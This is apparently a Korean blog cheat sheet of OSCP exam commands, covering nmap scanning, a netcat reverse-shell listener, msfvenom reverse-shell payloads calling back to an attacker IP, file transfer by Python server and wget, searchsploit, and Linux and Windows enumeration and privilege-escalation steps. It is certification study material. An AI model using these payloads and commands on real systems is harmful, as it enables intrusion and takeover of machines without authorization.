KIMKYUTAE.COM · ©
OSCP 기본 명령어 모음
NMAP
nmap -sC -sV [TARGET_IP]
- -sC : 기본 스크립트 사용
- -sV : 버전 정보 출력
nmap -p- -Pn -T5 [TARGET_IP]
- -p- : 1~65535까지 모든 포트 스캔
- -Pn : ICMP가 아닌 다른 방식으로 스캔 시도(윈도 방화벽은 ICMP를 기본 차단하여 다른 방식 사용)
- -T5 : 가장 빠른 스캔 속도
- 알려지지 않은 포트(서비스)가 스캔되면 CVE 찾아볼 것
nmap -sU -p161 [TARGET_IP]
- -sU : UDP scan
- -p161 : 특정 포트만 스캔(161-SNMP)
대역으로 스캔하면 너무 느림 -> 호스트 단위로, 터미널창 나눠서 할 것
NC
nc -lvnp [my_port]
- 리스닝 상태로 대기한다
- 리버스쉘 접속용도로 사용
MSF
- metasploit framework
- 리버스쉘 페이로드를 생성할 때 사용
msfvenom --list payload
- 사용가능한 payload 목록 출력
msfvenom -p windows/x64/shell_reverse_tcp lhost=[My_IP] lport=[1234] -f exe -o sh.exe
- -p : payload
- windows/x64/shell_reverse_tcp : 64bit
- windows/shell_reverse_tcp : 32bit
- linux/x64/shell_reverse_tcp : 64bit
- linux/x86/shell_reverse_tcp : 32bit
- lhost : 공격자 IP
- lport : 공격자 port
- -f : 파일 타입 지정(윈도 exe, 리눅스 elf)
- -o : 저장할 파일명
Python Server
python3 -m http.server 80
- 실행시킨 위치에서 서버를 열고 대기한다
wget http://[my_ip]/[file_name]
- python서버에서 파일을 다운로드한다
SUDO
sudo su 와 sudo -i 차이 비교
| 비교 항목 | sudo su | sudo -i |
| 현재 디렉토리 | 실행했던 위치 그대로 유지 | root의 홈 디렉토리 (/root)로 이동 |
환경 변수 ($PATH 등) | 이전 사용자의 환경 변수가 남아있음 | root의 순수한 환경 변수로 초기화 |
| 실제 작동 방식 | sudo 권한으로 su 명령어를 실행 | root 계정으로 시뮬레이션 로그인 (login shell) |
| 추천 상황 | 현재 작업 중인 폴더 안에서 권한만 급하게 올릴 때 | 일반적인 모든 루트 작업 |
- sudo su (혼합형 권한 상승) : su는 Switch User의 줄임말입니다. sudo su를 입력하면 “sudo 권한을 이용해 root 사용자로 전환하겠다”는 의미
- sudo -i (완전한 로그인 ) : -i 옵션은 Interactive Login을 의미합니다. 즉, root 계정으로 아예 “새로 로그인”을 하겠다는 의미
SEARCHSPLOIT
searchsploit 키워드
- os 이름, 버전, 서비스명, cve 번호 등으로 검색
searchsploit -m db_id번호
- 현재 위치로 익스플로잇 파일을 복사해줌
searchsploit -x db_id번호
- 주석, 컴파일 방법, 사용법 등 미리보기
LINUX
chmod +x [file_name]
- 실행권한 추가
mousepad [file_name]
- 메모장으로 파일 열기
cat /etc/passwd
- 모든 사용자 열거
- 로그인 이름 : 암호화된 암호 : UID : GID : 설명 : 홈 폴더 : 로그인 쉘
hostname
- 호스트네임
cat /etc/issue
cat /etc/os-release
uname -a
- 운영체제 릴리스 및 버전 정보
ps aux
- 시스템 프로세스 목록
ip a
ifconfig
- 네트워크 어댑터의 TCP/IP 구성 확인
routel
- 네트워크 라우팅 테이블 표시
strings [바이너리파일]
- 바이너리 파일에서 파일 내에 있는 4글자 이상의 연속된 문자열을 모두 출력
grep -A 10 -i "write" textfile.txt
- textfile에서 write 가 들어간 문장과 그 아래 10줄을 같이 출력
which unix-check
- unix-check 파일 위치 찾기
Windows
powershell -exec bypass
- powershell 실행
whoami /priv
- 내 권한 확인
move a.exe "c:\program files\ca\b.exe"
- 파일 이동
net stop [service_name]
net start [service_name]
- 서비스 중지/시작
shutdown /r /t 0
- 즉시 재부팅





